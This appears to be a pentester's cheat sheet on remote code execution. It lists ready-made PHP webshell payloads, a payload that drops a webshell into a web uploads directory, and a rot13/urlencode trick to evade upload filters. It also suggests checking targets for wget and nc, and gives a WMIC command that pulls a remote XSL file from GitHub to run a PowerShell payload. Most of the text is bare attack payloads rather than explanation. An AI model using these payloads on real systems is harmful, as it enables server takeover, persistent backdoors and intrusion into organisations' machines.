Remote Code Execution
RCE
PHP RCE
- Test a form for vulnerability to PHP RCE:
<?php phpinfo(); ?>
- Get a remote PHP shell:
<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>
- Upload a file:
<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>
- Evade file-type upload filters using rot13 + urlencode:
<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/testfile.php', str_rot13(urldecode($payload))); ?>
RCE via webshell
- Pentest Monkey has an excellent page of reverse shells in many languages: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- See if the target machine has handy utilities:
which wget which nc
RCE via WMIC
Running Powershell on a target without Powershell installed:
Generate payload with web_delivery
Encode Payload
Include payload in xsl file
wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"